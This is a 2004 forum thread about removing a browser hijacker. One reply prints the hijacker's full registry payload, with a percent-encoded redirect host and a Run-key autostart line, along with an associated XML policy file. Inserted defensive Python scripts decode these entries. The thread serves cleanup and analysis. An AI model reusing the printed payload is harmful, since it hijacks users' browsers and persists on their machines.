Solved

Unknown virus or malicious file

Posted on 2004-04-27
Last Modified: 2007-12-19
I have a serious problem. I believe I've been infected by something that seems to act like adware, like a virus and a cookie at the same time. It makes my Internet Explorer run improperly. What it does is that it sets my web homepage as freednshost.info and every time I change it to another webpage, as soon as I close the program and open it again, it's back to freednshost.info. Also every time I click a link on any Internet webpage it will send me to that same page, freednshost.info, and I get some sort of search engine with an irritating little stick man dancing up and down on the page. This virus also puts unsolicited Internet Explorer shortcuts on my active desktop and it shows mortgage ads on my options menu in Internet Explorer.
 

I've tried everything. I've scanned my computer, looked for the infected file manually and I've downloaded the latest virus definitions for my Norton Antivirus, but it doesn't seem to help.
What do I do?
0
Question by:datinfo
12 Comments
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934730

After installing them, first update them and then run.

Spyware/Adware removal tools:
------------------------------

What is spyware : http://www.spychecker.com/spyware.html

SpyBot-S&D : http://www.safer-networking.org/

Ad-aware : http://www.webattack.com/download/dladaware.shtml

CWShredder: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml

HijackThis : http://www.spychecker.com/program/hijackthis.html
0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934732
Check these registry entries

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\Internet Explorer\SearchURL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL
HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant
HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Search Bar


and remove freednshost.info. Before doing that, back up your registry.
0
 

Author Comment

by:datinfo
ID: 10934758
Thanks! That was really fast! I just posted the question! I honestly didn't expect such a fast answer!
0
 
LVL 49

Accepted Solution

by:
sunray_2003 earned 125 total points
ID: 10934761
Also check the host file

Windows 95/98/Me c:\windows\hosts

Windows NT/2000/XP Pro  c:\winnt\system32\drivers\etc\hosts

Windows XP Home c:\windows\system32\drivers\etc\hosts


and make sure only the below is present

localhost  127.0.0.1


0
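The hosts-file check above, written out as an added example (not code from the thread or from sunray_2003). It parses the text of a Windows hosts file and reports every mapping that is not the standard loopback entry. Note that the real file format is IP address first, then one or more host names; hijackers use the same file to blackhole antivirus and update sites to 127.0.0.1 or to redirect popular names to a foreign address. The sample file and its extra entries are constructed for illustration.

```python
"""Audit a Windows hosts file for browser-hijack style entries.

Added example, not from the original thread. Reads hosts-file text,
parses each mapping and flags everything that is not the expected
loopback entry.
"""
import ipaddress

# Constructed sample: a hosts file with two injected lines. The .example
# names are placeholders (RFC 2606), not real infection data.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
# lines below are constructed hijacker entries:
127.0.0.1       www.antivirus-vendor.example update.antivirus-vendor.example
203.0.113.5     www.search-engine.example
"""

# Mappings that are normal on a clean Windows hosts file.
EXPECTED = {("127.0.0.1", "localhost"), ("::1", "localhost")}


def parse_hosts(text):
    """Yield (ip, hostname, line_no) for every mapping in the file."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:
            yield ip, name.lower(), line_no


def audit_hosts(text):
    """Return findings as (line_no, ip, hostname, reason) tuples."""
    findings = []
    for ip, name, line_no in parse_hosts(text):
        if (ip, name) in EXPECTED:
            continue
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append((line_no, ip, name, "unparseable address"))
            continue
        if addr.is_loopback:
            # Typical trick: block AV/update sites by pointing them at self.
            reason = "host blackholed to loopback"
        else:
            # Typical trick: send a well-known name to an attacker host.
            reason = "host redirected to foreign address"
        findings.append((line_no, ip, name, reason))
    return findings


if __name__ == "__main__":
    for line_no, ip, name, reason in audit_hosts(SAMPLE_HOSTS):
        print(f"line {line_no}: {name} -> {ip}: {reason}")
```

To run it against a real machine, replace SAMPLE_HOSTS with the contents of the hosts file at the path for your Windows version (listed in the comment above); a clean file produces no findings.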
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934762
datinfo,
> I honestly didn't expect such a fast answer!

You will be surprised every time you post .. Of course I should be online. LOL !!
0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10935166
Thanks for the super fast feedback
0

 

Expert Comment

by:knuthf
ID: 10982115
Whoops,
You forgot the most important key of them all: the "RUN" keys.
(RUN/RUNONCE). In particular:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run
If this has a value, e.g.
            sys    REG_SZ  "regedit -s sys.reg"
delete this, and any other line that does not belong to anything you want to start.
Search the %WINDIR% directory for files recently updated; same with e.g. WINNT\system32. The last files updated should only be the Performance log files.

Your "sys.reg" is downloaded from a site that I am trying to find - the problem is that it first installs itself as an IE "Cookie" in the temporary Internet files - and then after a while it is moved. I had the following installed on February 26 - to wake up on April 17 at 19:40 - and slip through all virus scanners:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"

----------------
That is one. The other is
<?xml version="1.0"?>
<securitypolicy version="1">
      <fwdebuglog debugflags="0x00000000" maxdebuglog="0"/>
      <lockupinfo server="208.185.174.60" port="0" enable="true"/>
      <startuphookafd wsockvermajor="0x00050000" wsockverminor="0x089319cb" enable="true"/>
      <processes>
            <process name="fssm32.exe" openprocessaction="allow">
                  <md5table>
                        <md5hex>91feb4e9-8cf1e8e5-4f6f306a-e1399374</md5hex>
                        <md5hex>2f856f29-4d155a8c-c4ebb124-3bfeb9d4</md5hex>
                        <md5hex>6ea475f6-d34c3c6d-7a8a6845-a525d6e6</md5hex>
                  </md5table>
            </process>
      </processes>
</securitypolicy>
...
- but where the IP address is a dead give-away: here ZoneLabs to fetch an executable.
Use Security Policy to avoid changes to the RUN keys - some tools like PortPro will guard the keys and notify before they are changed. The WEB pages are malicious - and most believe that viruses spread with mail attachments.

I have in another response recommended that all file names in "system32" be changed with e.g. 1st and 4th letter uppercase - rest lowercase. You make some convention that allows you to see in Taskman when an intrusion has been made - e.g. the fssm32.exe above would not be FssM32.exe - so KILL IT.

Make your own search page - distribute this - or force everyone to Google - then "Brand" IE - that prevents all users from changing the search page, homepage and security settings.
0
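The percent escapes in the REGEDIT4 export above are ordinary URL encoding, so the hidden host can be recovered mechanically. The following is an added example (not code from the thread, from knuthf, or from any product mentioned): it parses a .reg text export, decodes the Internet Explorer start/search URLs listed in sunray_2003's key list, and flags autostart entries under the Run/RunOnce keys such as the "sys" value knuthf points out. The sample export is constructed from the value shapes shown on the page; the decoded host is simply what those escapes spell out.

```python
"""Decode and triage a REGEDIT4/5 export for IE hijack settings.

Added example, not from the original thread. On a Windows box the
input would come from:  reg export "HKCU\Software\Microsoft\Internet Explorer" ie.reg
"""
from urllib.parse import unquote, urlsplit

# Constructed sample reproducing the value shapes from the thread.
SAMPLE_REG = r'''REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"
'''

# Value names a hijacker rewrites (from the key list earlier in the thread).
IE_URL_VALUES = {"Start Page", "HOMEOldSP", "Search Bar", "Search Page",
                 "SearchAssistant", "CustomizeSearch", "Default_Page_URL",
                 "Default_Search_URL", "SearchURL"}


def parse_reg(text):
    """Return a list of (key, value_name, value) from a .reg text export."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith(";")
                or line.upper().startswith("REGEDIT")
                or line.startswith("Windows Registry Editor")):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]                       # new key section
            continue
        if key is None or "=" not in line:
            continue
        name_part, _, value_part = line.partition("=")
        name = name_part.strip().strip('"')        # '@' stays as default name
        value = value_part.strip()
        if value.startswith('"') and value.endswith('"'):
            # REG_SZ: undo the .reg escaping of backslash and quote
            value = value[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        entries.append((key, name, value))
    return entries


def triage(entries):
    """Return findings as (key, name, decoded_value, host, reason)."""
    findings = []
    for key, name, value in entries:
        leaf = key.rsplit("\\", 1)[-1].lower()
        if "Internet Explorer" in key and name in IE_URL_VALUES:
            decoded = unquote(value)
            host = urlsplit(decoded).hostname or ""
            reason = "IE start/search URL"
            if decoded != value:
                reason += " with percent-encoded host (obfuscation)"
            findings.append((key, name, decoded, host, reason))
        elif leaf in ("run", "runonce") and "CurrentVersion" in key:
            findings.append((key, name, value, "", "autostart entry"))
    return findings


if __name__ == "__main__":
    for key, name, decoded, host, reason in triage(parse_reg(SAMPLE_REG)):
        print(f"{key}\\{name}\n    {decoded}\n    [{reason}]")
```

Every URL value that decodes to something other than its raw form is worth a second look: legitimate home pages are not written as `%74%6B...`. The hosts it reveals and anything under Run that you do not recognise are what to remove after backing up the registry, as the earlier comments advise.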
 

Expert Comment

by:knuthf
ID: 10982130
I know I posted a virus.
But I believe in educating by real examples, not just mumble jumble talking.
Please beware - it is a virus that will set IE to search somewhere else.
0
 

Expert Comment

by:knuthf
ID: 10982160
IP address resolution:
See http://www.geektools.com/whois.php

It is good because it links in with the regional whois databases.

Another tool is the ID server found at www.grc.com - Steve Gibson's page.
0
 

Expert Comment

by:mormanb
ID: 11136352
I am not able to delete the vsconfig.xml. It says the process is being used by another process. I restored my registry; how can I get rid of this vsconfig.xml?
0
 

Expert Comment

by:knuthf
ID: 11163949
Rename to e.g. vsconfig.xml.vir - designate open/edit of .vir to Notepad.

Delete *.vir next time you have rebooted the system.

This also allows you to rename files that you do not trust - and prevent these from being loaded at boot-up. You can now inspect with suited tools - and if the file is e.g. part of MS administrative tools, then you just rename the file - back to vsconfig.xml...
0
 

Expert Comment

by:knuthf
ID: 11163974
Identify the files you have verified with a combination of uppercase/lowercase names.
E.g. to VscOnfig.xml - described in another posting - here the first and fourth characters are in upper case.
0
